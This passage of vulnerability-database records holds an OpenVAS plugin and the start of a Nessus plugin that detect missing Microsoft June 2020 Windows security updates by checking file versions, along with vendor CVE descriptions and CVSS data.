"CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1280", "CVE-2020-1211", "CVE-2020-1279", "CVE-2020-1273", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1284", "CVE-2020-1120", "CVE-2020-1306", "CVE-2020-1305", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1266", "CVE-2020-1311", "CVE-2020-1258", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1307", "CVE-2020-1259", "CVE-2020-1257", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1209", "CVE-2020-1199", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1313", "CVE-2020-1255", "CVE-2020-1232", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1296", "CVE-2020-1222", "CVE-2020-1241", "CVE-2020-1216", "CVE-2020-1292", "CVE-2020-1234", "CVE-2020-1247", "CVE-2020-1304", "CVE-2020-1324", "CVE-2020-1312", "CVE-2020-1271", "CVE-2020-1246", "CVE-2020-1261", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1204", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1269", "CVE-2020-1233", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1268", "CVE-2020-1162", "CVE-2020-1316", "CVE-2020-1294", "CVE-2020-1293", "CVE-2020-1238", "CVE-2020-1286", "CVE-2020-1242", "CVE-2020-1206", "CVE-2020-1264", "CVE-2020-1196", "CVE-2020-1309", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1201", "CVE-2020-1270", "CVE-2020-1248", "CVE-2020-1202", "CVE-2020-1291", "CVE-2020-1217", "CVE-2020-1197", "CVE-2020-1283"], "description": "This host is missing a critical security\n update according to Microsoft KB4557957", "modified": "2020-07-17T00:00:00", "published": "2020-06-10T00:00:00", "id": "OPENVAS:1361412562310817144", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817144", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4557957)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817144\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0915\", \"CVE-2020-0916\", \"CVE-2020-0986\", \"CVE-2020-1120\",\n \"CVE-2020-1160\", \"CVE-2020-1162\", \"CVE-2020-1194\", \"CVE-2020-1196\",\n \"CVE-2020-1197\", \"CVE-2020-1199\", \"CVE-2020-1201\", \"CVE-2020-1202\",\n \"CVE-2020-1203\", \"CVE-2020-1204\", \"CVE-2020-1206\", \"CVE-2020-1207\",\n \"CVE-2020-1208\", \"CVE-2020-1209\", \"CVE-2020-1211\", \"CVE-2020-1212\",\n \"CVE-2020-1213\", \"CVE-2020-1214\", \"CVE-2020-1215\", \"CVE-2020-1216\",\n \"CVE-2020-1217\", \"CVE-2020-1219\", \"CVE-2020-1220\", \"CVE-2020-1222\",\n \"CVE-2020-1230\", \"CVE-2020-1231\", \"CVE-2020-1232\", \"CVE-2020-1233\",\n \"CVE-2020-1234\", \"CVE-2020-1235\", \"CVE-2020-1236\", \"CVE-2020-1237\",\n \"CVE-2020-1238\", \"CVE-2020-1239\", \"CVE-2020-1241\", \"CVE-2020-1242\",\n \"CVE-2020-1244\", \"CVE-2020-1246\", \"CVE-2020-1247\", \"CVE-2020-1248\",\n \"CVE-2020-1251\", \"CVE-2020-1253\", \"CVE-2020-1254\", \"CVE-2020-1255\",\n \"CVE-2020-1257\", \"CVE-2020-1258\", \"CVE-2020-1259\", \"CVE-2020-1261\",\n \"CVE-2020-1262\", \"CVE-2020-1263\", \"CVE-2020-1264\", \"CVE-2020-1266\",\n \"CVE-2020-1268\", \"CVE-2020-1269\", \"CVE-2020-1270\", \"CVE-2020-1271\",\n \"CVE-2020-1272\", \"CVE-2020-1273\", \"CVE-2020-1274\", \"CVE-2020-1275\",\n \"CVE-2020-1276\", \"CVE-2020-1277\", \"CVE-2020-1278\", \"CVE-2020-1279\",\n \"CVE-2020-1280\", \"CVE-2020-1281\", \"CVE-2020-1282\", \"CVE-2020-1283\",\n \"CVE-2020-1284\", \"CVE-2020-1286\", \"CVE-2020-1287\", \"CVE-2020-1290\",\n \"CVE-2020-1291\", \"CVE-2020-1292\", \"CVE-2020-1293\", \"CVE-2020-1294\",\n \"CVE-2020-1296\", \"CVE-2020-1299\", \"CVE-2020-1300\", \"CVE-2020-1301\",\n \"CVE-2020-1302\", \"CVE-2020-1304\", \"CVE-2020-1305\", \"CVE-2020-1306\",\n \"CVE-2020-1307\", \"CVE-2020-1309\", \"CVE-2020-1311\", \"CVE-2020-1312\",\n \"CVE-2020-1313\", \"CVE-2020-1314\", \"CVE-2020-1315\", \"CVE-2020-1316\",\n \"CVE-2020-1317\", \"CVE-2020-1324\", \"CVE-2020-1334\", \"CVE-2020-1348\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-10 08:52:23 +0530 (Wed, 10 Jun 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4557957)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4557957\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error when the Windows kernel fails to properly handle objects in memory.\n\n - An error when the Windows GDI component improperly discloses the contents of its\n memory.\n\n - An error when the Windows Runtime improperly handles objects in memory.\n\n - An error when Connected User Experiences and Telemetry Service improperly\n handles file operations.\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, elevate privilges, disclose sensitive information, bypass\n security restrictions, conduct spoofing and denial of service attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 2004 for 32-bit Systems\n\n - Microsoft Windows 10 Version 2004 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4557957\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"Gdiplus.dll\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.19041.0\", test_version2:\"10.0.19041.328\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Gdiplus.dll\",\n file_version:dllVer, vulnerable_range:\"10.0.19041.0 - 10.0.19041.328\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2020-10-15T09:55:06", "description": "The remote Windows host is missing security update 4561674\nor cumulative update 4561612. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1282, CVE-2020-1334)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1263)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)", "edition": 9, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-06-09T00:00:00", "title": "KB4561674: Windows Server 2012 June 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1253", "CVE-2020-1207", "CVE-2020-1287", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-0916", "CVE-2020-1220", "CVE-2020-1263", "CVE-2020-1310", "CVE-2020-1251", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1311", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1255", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1216", "CVE-2020-1247", "CVE-2020-1246", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1196", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1270", "CVE-2020-1291", "CVE-2020-1260"], "modified": "2020-06-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4561612.NASL", "href": "https://www.tenable.com/plugins/nessus/137257", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137257);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/14\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1160\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1236\",\n \"CVE-2020-1239\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1260\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1270\",\n \"CVE-2020-1272\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1287\",\n \"CVE-2020-1291\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1310\",\n \"CVE-2020-1311\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1317\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561612\");\n script_xref(name:\"MSKB\", value:\"4561674\");\n script_xref(name:\"MSFT\", value:\"MS20-4561612\");\n script_xref(name:\"MSFT\", value:\"MS20-4561674\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0248-S\");\n\n script_name(english:\"KB4561674: Windows Server 2012 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561674\nor cumulative update 4561612. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1282, CVE-2020-1334)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1263)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\");\n # https://support.microsoft.com/en-us/help/4561612/windows-server-2012-update-kb4561612\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0c1557bf\");\n # https://support.microsoft.com/en-us/help/4561674/windows-server-2012-update-kb4561674\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?003ee4f3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4561674 or Cumulative Update KB4561612.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1299\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561612',\n '4561674'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, 